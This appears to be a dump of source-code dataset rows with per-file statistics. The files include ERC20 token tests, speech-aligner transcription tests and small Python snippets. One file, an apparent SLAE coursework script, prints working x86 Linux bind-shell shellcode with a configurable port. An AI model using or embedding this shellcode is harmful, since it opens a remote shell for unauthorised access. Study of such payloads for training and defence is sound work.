| 17.4 | 37 | 0.793103 | 22 | 174 | 6.272727 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 174 | 9 | 38 | 19.333333 | 0.92 | 0.149425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
83fd0fabf38f5d35176e41e3f1c735c9f817be6d | 121 | py | Python | vetor.py | adeniasfilho/dio-desafio-github-primeiro-repositorio | 445c56065c01642b16fda2a5919407e260cd8349 | [
"MIT"
] | null | null | null | vetor.py | adeniasfilho/dio-desafio-github-primeiro-repositorio | 445c56065c01642b16fda2a5919407e260cd8349 | [
"MIT"
] | null | null | null | vetor.py | adeniasfilho/dio-desafio-github-primeiro-repositorio | 445c56065c01642b16fda2a5919407e260cd8349 | [
"MIT"
] | null | null | null | N = [0,0,0,0,0,0,0,0,0,0]
x = int(input())
for i in range(10):
N[i]=x
x = x * 2
print('N[{}] = {} '.format(i,N[i])) | 20.166667 | 37 | 0.446281 | 31 | 121 | 1.741935 | 0.419355 | 0.333333 | 0.444444 | 0.518519 | 0.185185 | 0.185185 | 0.185185 | 0.185185 | 0.185185 | 0 | 0 | 0.135417 | 0.206612 | 121 | 6 | 37 | 20.166667 | 0.427083 | 0 | 0 | 0 | 0 | 0 | 0.090164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
790b5eaa8022d14560bfc4707727abb81d0adce1 | 21,056 | py | Python | src/starkware/starknet/apps/starkgate/cairo/token_test.py | starkware-libs/starkgate-contracts | 28f4032b101003b2c6682d753ea61c86b732012c | [
"Apache-2.0"
] | 9 | 2022-01-27T20:20:06.000Z | 2022-03-29T12:05:57.000Z | src/starkware/starknet/apps/starkgate/cairo/token_test.py | starkware-libs/starkgate-contracts | 28f4032b101003b2c6682d753ea61c86b732012c | [
"Apache-2.0"
] | 2 | 2022-02-16T17:05:56.000Z | 2022-02-16T17:06:54.000Z | src/starkware/starknet/apps/starkgate/cairo/token_test.py | starkware-libs/starkgate-contracts | 28f4032b101003b2c6682d753ea61c86b732012c | [
"Apache-2.0"
] | 1 | 2022-02-03T13:39:44.000Z | 2022-02-03T13:39:44.000Z | import asyncio
import copy
import random
from typing import Callable
import pytest
from starkware.starknet.apps.starkgate.cairo.contracts import erc20_contract_def
from starkware.starknet.apps.starkgate.conftest import str_to_felt
from starkware.starknet.testing.contract import StarknetContract
from starkware.starknet.testing.starknet import Starknet
from starkware.starkware_utils.error_handling import StarkException
AMOUNT_BOUND = 2 ** 256
GOVERNOR_ADDRESS = str_to_felt("GOVERNOR")
MINTER_ADDRESS = str_to_felt("MINTER")
L1_ACCOUNT = 1
initial_balances = {1: 13, 2: 10}
uninitialized_account = 3
initial_total_supply = sum(initial_balances.values())
initialized_account = random.choice(list(initial_balances.keys()))
another_account = 4 # Not initialized_account and not uninitialized_account.
# 0 < TRANSFER_AMOUNT < APPROVE_AMOUNT < initial_balance < HIGH_APPROVE_AMOUNT.
TRANSFER_AMOUNT = int((initial_balances[initialized_account] + 1) / 2)
APPROVE_AMOUNT = 8
HIGH_APPROVE_AMOUNT = 100
MINT_AMOUNT = 10
BURN_AMOUNT = int((initial_balances[initialized_account] + 1) / 2)
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
loop.close()
@pytest.fixture(scope="session")
async def session_starknet() -> Starknet:
return await Starknet.empty()
@pytest.fixture(scope="session")
async def session_empty_token_contract(
session_starknet: Starknet,
token_name: int,
token_symbol: int,
token_decimals: int,
) -> StarknetContract:
return await session_starknet.deploy(
constructor_calldata=[
token_name,
token_symbol,
token_decimals,
MINTER_ADDRESS,
],
contract_def=erc20_contract_def,
)
@pytest.fixture(scope="session")
async def uint256(session_empty_token_contract: StarknetContract) -> Callable:
def convert_int_to_uint256(num: int):
if num < 0:
num += 2 ** 256
return session_empty_token_contract.Uint256(low=num % 2 ** 128, high=num // 2 ** 128)
return convert_int_to_uint256
@pytest.fixture(scope="session")
async def session_token_contract(
session_empty_token_contract: StarknetContract,
uint256: Callable,
) -> StarknetContract:
for account in initial_balances:
await session_empty_token_contract.permissionedMint(
recipient=account, amount=uint256(initial_balances[account])
).invoke(caller_address=MINTER_ADDRESS)
return session_empty_token_contract
@pytest.fixture
async def starknet(session_starknet: Starknet) -> Starknet:
return copy.deepcopy(session_starknet)
@pytest.fixture
async def token_contract(
starknet: Starknet, session_token_contract: StarknetContract
) -> StarknetContract:
return StarknetContract(
state=starknet.state,
abi=erc20_contract_def.abi,
contract_address=session_token_contract.contract_address,
deploy_execution_info=session_token_contract.deploy_execution_info,
)
@pytest.mark.asyncio
async def test_permitted_minter(token_contract: StarknetContract):
execution_info = await token_contract.permittedMinter().call()
assert execution_info.result == (MINTER_ADDRESS,)
@pytest.mark.asyncio
async def test_name(token_contract: StarknetContract, token_name: int):
execution_info = await token_contract.name().call()
assert execution_info.result == (token_name,)
@pytest.mark.asyncio
async def test_symbol(token_contract: StarknetContract, token_symbol: int):
execution_info = await token_contract.symbol().call()
assert execution_info.result == (token_symbol,)
@pytest.mark.asyncio
async def test_decimal(token_contract: StarknetContract, token_decimals: int):
execution_info = await token_contract.decimals().call()
assert execution_info.result == (token_decimals,)
@pytest.mark.asyncio
async def test_total_supply(token_contract: StarknetContract, uint256: Callable):
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply),)
@pytest.mark.asyncio
async def test_balance_of(token_contract: StarknetContract, uint256: Callable):
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (uint256(initial_balances[initialized_account]),)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (uint256(0),)
@pytest.mark.asyncio
async def test_transfer_zero_sender(token_contract: StarknetContract, uint256: Callable):
amount = uint256(TRANSFER_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(sender\)"):
await token_contract.transfer(recipient=uninitialized_account, amount=amount).invoke(
caller_address=0
)
@pytest.mark.asyncio
async def test_transfer_zero_recipient(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert_not_zero\(recipient\)"):
await token_contract.transfer(recipient=0, amount=uint256(TRANSFER_AMOUNT)).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_transfer_amount_bigger_than_balance(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(initial_balances[initialized_account] + 1)
with pytest.raises(StarkException, match="assert_not_zero\(enough_balance\)"):
await token_contract.transfer(recipient=uninitialized_account, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_transfer_invalid_uint256_amount(token_contract: StarknetContract, uint256: Callable):
amount = uint256(AMOUNT_BOUND)
with pytest.raises(StarkException, match="uint256_check\(amount\)"):
await token_contract.transfer(recipient=uninitialized_account, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_transfer_happy_flow(token_contract: StarknetContract, uint256: Callable):
transfer_amount = uint256(TRANSFER_AMOUNT)
await token_contract.transfer(recipient=uninitialized_account, amount=transfer_amount).invoke(
caller_address=initialized_account
)
expected_balance = uint256(initial_balances[initialized_account] - TRANSFER_AMOUNT)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (expected_balance,)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (transfer_amount,)
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply),)
await token_contract.transfer(recipient=initialized_account, amount=transfer_amount).invoke(
caller_address=uninitialized_account
)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (uint256(initial_balances[initialized_account]),)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (uint256(0),)
# Tests the case of sender = recipient.
await token_contract.transfer(recipient=initialized_account, amount=transfer_amount).invoke(
caller_address=initialized_account
)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (uint256(initial_balances[initialized_account]),)
@pytest.mark.asyncio
async def test_approve_zero_owner(token_contract: StarknetContract, uint256: Callable):
amount = uint256(APPROVE_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(caller\)"):
await token_contract.approve(spender=uninitialized_account, amount=amount).invoke(
caller_address=0
)
@pytest.mark.asyncio
async def test_approve_zero_spender(token_contract: StarknetContract, uint256: Callable):
amount = uint256(APPROVE_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(spender\)"):
await token_contract.approve(spender=0, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_approve_invalid_uint256_amount(token_contract: StarknetContract, uint256: Callable):
amount = uint256(AMOUNT_BOUND)
with pytest.raises(StarkException, match="uint256_check\(amount\)"):
await token_contract.approve(spender=uninitialized_account, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_approve_happy_flow(token_contract: StarknetContract, uint256: Callable):
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(0),)
await token_contract.approve(
spender=uninitialized_account, amount=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(APPROVE_AMOUNT),)
@pytest.mark.asyncio
async def test_transfer_from_zero_sender(token_contract: StarknetContract, uint256: Callable):
# The contract fails when checking for sufficient allowance of account 0.
# Only because we cannot put a balance for address(0) or approve on its behalf.
# Could we do that, we would have failed on the more sensible error assert_not_zero(sender).
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.transferFrom(
sender=0, recipient=uninitialized_account, amount=uint256(TRANSFER_AMOUNT)
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_zero_recipient(token_contract: StarknetContract, uint256: Callable):
amount = uint256(TRANSFER_AMOUNT)
await token_contract.approve(spender=another_account, amount=uint256(TRANSFER_AMOUNT)).invoke(
caller_address=initialized_account
)
with pytest.raises(StarkException, match="assert_not_zero\(recipient\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=0, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_amount_bigger_than_balance(
token_contract: StarknetContract, uint256: Callable
):
await token_contract.approve(
spender=another_account, amount=uint256(HIGH_APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
amount = uint256(initial_balances[initialized_account] + 1)
with pytest.raises(StarkException, match="assert_not_zero\(enough_balance\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_amount_bigger_than_allowance(
token_contract: StarknetContract, uint256: Callable
):
await token_contract.approve(spender=another_account, amount=uint256(APPROVE_AMOUNT)).invoke(
caller_address=initialized_account
)
amount = uint256(APPROVE_AMOUNT + 1)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_invalid_uint256_amount(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(AMOUNT_BOUND)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
@pytest.mark.parametrize("approve_num", [APPROVE_AMOUNT, HIGH_APPROVE_AMOUNT])
async def test_transfer_from_happy_flow(
token_contract: StarknetContract, uint256: Callable, approve_num: int
):
await token_contract.approve(spender=another_account, amount=uint256(approve_num)).invoke(
caller_address=initialized_account
)
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=uint256(TRANSFER_AMOUNT)
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_increase_allowance_zero_spender(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert_not_zero\(spender\)"):
await token_contract.increaseAllowance(
spender=0, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_increase_allowance_invalid_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match="uint256_check\(added_value\)"):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(AMOUNT_BOUND)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_increase_allowance_overflow(token_contract: StarknetContract, uint256: Callable):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
with pytest.raises(StarkException, match="assert \(is_overflow\) = 0"):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(AMOUNT_BOUND - APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_decrease_allowance_zero_spender(token_contract: StarknetContract, uint256: Callable):
approve_amount = uint256(APPROVE_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.decreaseAllowance(spender=0, subtracted_value=approve_amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_decrease_allowance_bigger_than_allowance(
token_contract: StarknetContract, uint256: Callable
):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.decreaseAllowance(
spender=uninitialized_account, subtracted_value=uint256(APPROVE_AMOUNT + 1)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_decrease_allowance_invalid_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match="uint256_check\(subtracted_value\)"):
await token_contract.decreaseAllowance(
spender=uninitialized_account, subtracted_value=uint256(AMOUNT_BOUND)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_increase_and_decrease_allowance_happy_flow(
token_contract: StarknetContract, uint256: Callable
):
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(0),)
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(APPROVE_AMOUNT),)
await token_contract.decreaseAllowance(
spender=uninitialized_account, subtracted_value=uint256(int(APPROVE_AMOUNT / 2))
).invoke(caller_address=initialized_account)
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(APPROVE_AMOUNT - int(APPROVE_AMOUNT / 2)),)
@pytest.mark.asyncio
async def test_permissioned_mint_wrong_minter(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert caller_address = permitted_address"):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=uint256(MINT_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS + 1)
@pytest.mark.asyncio
async def test_permissioned_mint_zero_recipient(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match="assert_not_zero\(recipient\)"):
await token_contract.permissionedMint(recipient=0, amount=uint256(MINT_AMOUNT)).invoke(
caller_address=MINTER_ADDRESS
)
@pytest.mark.asyncio
async def test_permissioned_mint_invalid_uint256_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match=f"uint256_check\(amount\)"):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=uint256(AMOUNT_BOUND)
).invoke(caller_address=MINTER_ADDRESS)
@pytest.mark.asyncio
async def test_permissioned_mint_total_supply_out_of_range(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(AMOUNT_BOUND - initial_total_supply)
with pytest.raises(StarkException, match=f"assert \(is_overflow\) = 0"):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=amount
).invoke(caller_address=MINTER_ADDRESS)
@pytest.mark.asyncio
async def test_permissioned_mint_happy_flow(token_contract: StarknetContract, uint256: Callable):
await token_contract.permissionedMint(
recipient=uninitialized_account, amount=uint256(MINT_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (uint256(MINT_AMOUNT),)
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply + MINT_AMOUNT),)
@pytest.mark.asyncio
async def test_permissioned_burn_wrong_minter(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert caller_address = permitted_address"):
await token_contract.permissionedBurn(
account=initialized_account, amount=uint256(BURN_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS + 1)
@pytest.mark.asyncio
async def test_permissioned_burn_zero_account(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert_not_zero\(account\)"):
await token_contract.permissionedBurn(account=0, amount=uint256(BURN_AMOUNT)).invoke(
caller_address=MINTER_ADDRESS
)
@pytest.mark.asyncio
async def test_permissioned_burn_invalid_uint256_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match=f"uint256_check\(amount\)"):
await token_contract.permissionedBurn(
account=initialized_account, amount=uint256(AMOUNT_BOUND)
).invoke(caller_address=MINTER_ADDRESS)
@pytest.mark.asyncio
async def test_permissioned_burn_amount_bigger_than_balance(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(initial_balances[initialized_account] + 1)
with pytest.raises(StarkException, match=f"assert_not_zero\(enough_balance\)"):
await token_contract.permissionedBurn(account=initialized_account, amount=amount).invoke(
caller_address=MINTER_ADDRESS
)
@pytest.mark.asyncio
async def test_permissioned_burn_happy_flow(token_contract: StarknetContract, uint256: Callable):
await token_contract.permissionedMint(
recipient=initialized_account, amount=uint256(MINT_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS)
await token_contract.permissionedBurn(
account=initialized_account, amount=uint256(BURN_AMOUNT)
).invoke(caller_address=MINTER_ADDRESS)
expected_balance = uint256(initial_balances[initialized_account] + MINT_AMOUNT - BURN_AMOUNT)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (expected_balance,)
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply + MINT_AMOUNT - BURN_AMOUNT),)
| 40.885437 | 100 | 0.772226 | 2,367 | 21,056 | 6.5733 | 0.071821 | 0.094415 | 0.074041 | 0.052317 | 0.844077 | 0.809885 | 0.782634 | 0.74992 | 0.71682 | 0.665981 | 0 | 0.021829 | 0.140625 | 21,056 | 514 | 101 | 40.964981 | 0.838022 | 0.019519 | 0 | 0.562963 | 0 | 0 | 0.040362 | 0.030962 | 0 | 0 | 0 | 0 | 0.103704 | 1 | 0.004938 | false | 0 | 0.024691 | 0 | 0.046914 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
792807d1205a07683d66ba772f2e177c3fde461e | 2,778 | py | Python | tests/test_commandline_transcribe.py | erayee/Montreal-Forced-Aligner | becd3b316d1999212910b4d0976e8c0405241493 | [
"MIT"
] | 702 | 2016-06-14T23:18:05.000Z | 2022-03-28T07:39:54.000Z | tests/test_commandline_transcribe.py | erayee/Montreal-Forced-Aligner | becd3b316d1999212910b4d0976e8c0405241493 | [
"MIT"
] | 399 | 2016-06-15T17:02:58.000Z | 2022-03-31T06:21:41.000Z | tests/test_commandline_transcribe.py | erayee/Montreal-Forced-Aligner | becd3b316d1999212910b4d0976e8c0405241493 | [
"MIT"
] | 175 | 2016-07-27T15:26:04.000Z | 2022-03-22T04:05:57.000Z | import os
import sys
import pytest
from montreal_forced_aligner.command_line.transcribe import run_transcribe_corpus
from montreal_forced_aligner.command_line.mfa import parser
def test_transcribe(basic_corpus_dir, sick_dict_path, english_acoustic_model, generated_dir,
transcription_acoustic_model, transcription_language_model, temp_dir, transcribe_config):
output_path = os.path.join(generated_dir, 'transcribe_test')
command = ['transcribe', basic_corpus_dir, sick_dict_path, transcription_acoustic_model,
transcription_language_model, output_path,
'-t', temp_dir, '-q', '--clean', '--debug', '-v', '--config_path', transcribe_config]
args, unknown = parser.parse_known_args(command)
run_transcribe_corpus(args)
def test_transcribe_arpa(basic_corpus_dir, sick_dict_path, english_acoustic_model, generated_dir,
transcription_acoustic_model, transcription_language_model_arpa, temp_dir, transcribe_config):
if sys.platform == 'win32':
pytest.skip('No LM generation on Windows')
output_path = os.path.join(generated_dir, 'transcribe_test')
command = ['transcribe', basic_corpus_dir, sick_dict_path, transcription_acoustic_model,
transcription_language_model_arpa, output_path,
'-t', temp_dir, '-q', '--clean', '--debug', '-v', '--config_path', transcribe_config]
args, unknown = parser.parse_known_args(command)
run_transcribe_corpus(args)
def test_transcribe_speaker_dictionaries(multilingual_ipa_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model, generated_dir,
transcription_language_model, temp_dir, transcribe_config):
output_path = os.path.join(generated_dir, 'transcribe_test')
command = ['transcribe', multilingual_ipa_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model,
transcription_language_model, output_path,
'-t', temp_dir, '-q', '--clean', '--debug', '--config_path', transcribe_config]
args, unknown = parser.parse_known_args(command)
run_transcribe_corpus(args)
def test_transcribe_speaker_dictionaries_evaluate(multilingual_ipa_tg_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model, generated_dir,
transcription_language_model, temp_dir, transcribe_config):
output_path = os.path.join(generated_dir, 'transcribe_test')
command = ['transcribe', multilingual_ipa_tg_corpus_dir, ipa_speaker_dict_path, english_ipa_acoustic_model,
transcription_language_model, output_path,
'-t', temp_dir, '-q', '--clean', '--debug', '--config_path', transcribe_config, '--evaluate']
args, unknown = parser.parse_known_args(command)
run_transcribe_corpus(args) | 57.875 | 147 | 0.74586 | 336 | 2,778 | 5.696429 | 0.169643 | 0.067921 | 0.108673 | 0.106583 | 0.905956 | 0.905956 | 0.868339 | 0.858934 | 0.858934 | 0.858934 | 0 | 0.000855 | 0.158387 | 2,778 | 48 | 148 | 57.875 | 0.817793 | 0 | 0 | 0.538462 | 0 | 0 | 0.097157 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102564 | false | 0 | 0.128205 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7938e7963caddb154d982f74722a4ba303875369 | 86 | py | Python | problems/__init__.py | iamstevepaul/MRTA-Attention | fc177440f7354212c41ad02ef76fdda43cc0aa57 | [
"MIT"
] | 1 | 2021-12-14T01:04:22.000Z | 2021-12-14T01:04:22.000Z | problems/__init__.py | iamstevepaul/MRTA-Attention | fc177440f7354212c41ad02ef76fdda43cc0aa57 | [
"MIT"
] | null | null | null | problems/__init__.py | iamstevepaul/MRTA-Attention | fc177440f7354212c41ad02ef76fdda43cc0aa57 | [
"MIT"
] | null | null | null | from problems.vrp.problem_vrp import CVRP
from problems.mrta.problem_mrta import MRTA
| 28.666667 | 43 | 0.860465 | 14 | 86 | 5.142857 | 0.5 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 86 | 2 | 44 | 43 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f7381d635f3c0ce2d25584e3dfa645a0f5a58cc1 | 45 | py | Python | easyfilemanager/__init__.py | RaphaelNanje/easyfilemanager | 29cb6ad90dc28de41478ce7ed768917051f0988a | [
"MIT"
] | null | null | null | easyfilemanager/__init__.py | RaphaelNanje/easyfilemanager | 29cb6ad90dc28de41478ce7ed768917051f0988a | [
"MIT"
] | null | null | null | easyfilemanager/__init__.py | RaphaelNanje/easyfilemanager | 29cb6ad90dc28de41478ce7ed768917051f0988a | [
"MIT"
] | null | null | null | from easyfilemanager.core import FileManager
| 22.5 | 44 | 0.888889 | 5 | 45 | 8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f77cf6e3e3b57daa1f3fcfcbe5de8cdb309158e6 | 1,147 | py | Python | 1/create_shellcode.py | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | 1/create_shellcode.py | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | 1/create_shellcode.py | 91fc7b/SLAE | 8ba0831963b077cb3739b8bb53ed430cd3b564e0 | [
"Unlicense"
] | null | null | null | #!/usr/bin/python
import sys
shellcode_start = "\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x01\\x51\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc2\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x02\\x51\\x66\\x68"
shellcode_port = "\\x04\\xd2" #1234
shellcode_end = "\\x66\\x6a\\x02\\x89\\xe1\\x6a\\x10\\x51\\x52\\x89\\xe1\\xcd\\x80\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x04\\x6a\\x05\\x52\\x89\\xe1\\xcd\\x80\\x31\\xc9\\x89\\xc8\\xb0\\x66\\x89\\xcb\\xb3\\x05\\x51\\x51\\x52\\x89\\xe1\\xcd\\x80\\x89\\xc2\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x01\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\x31\\xc9\\xb1\\x02\\xcd\\x80\\x31\\xc0\\xb0\\x0b\\x31\\xc9\\x51\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xcd\\x80"
if len(sys.argv) == 2:
port_number = int(sys.argv[1])
#port_number = 1234
port_str = "{0:0{1}x}".format(port_number,4)
shellcode_port = "\\x" + port_str[0] + port_str[1] + "\\x" + port_str[2] + port_str[3]
#print "DEBUG " + shellcode_port
print shellcode_start + shellcode_port + shellcode_end
| 57.35 | 583 | 0.625109 | 212 | 1,147 | 3.306604 | 0.278302 | 0.077033 | 0.064194 | 0.068474 | 0.410842 | 0.389444 | 0.376605 | 0.32525 | 0.291013 | 0.21398 | 0 | 0.214945 | 0.054926 | 1,147 | 19 | 584 | 60.368421 | 0.431734 | 0.060157 | 0 | 0 | 0 | 0.222222 | 0.707635 | 0.684358 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.111111 | null | null | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f788413489ce0f689a7eeb6bbff4155d882fc6f7 | 21,161 | py | Python | xc7/tests/iosettings/generate.py | nfrancque/symbiflow-arch-defs | 14b0f43a50b515602bd48606e4edf8366459c63f | [
"ISC"
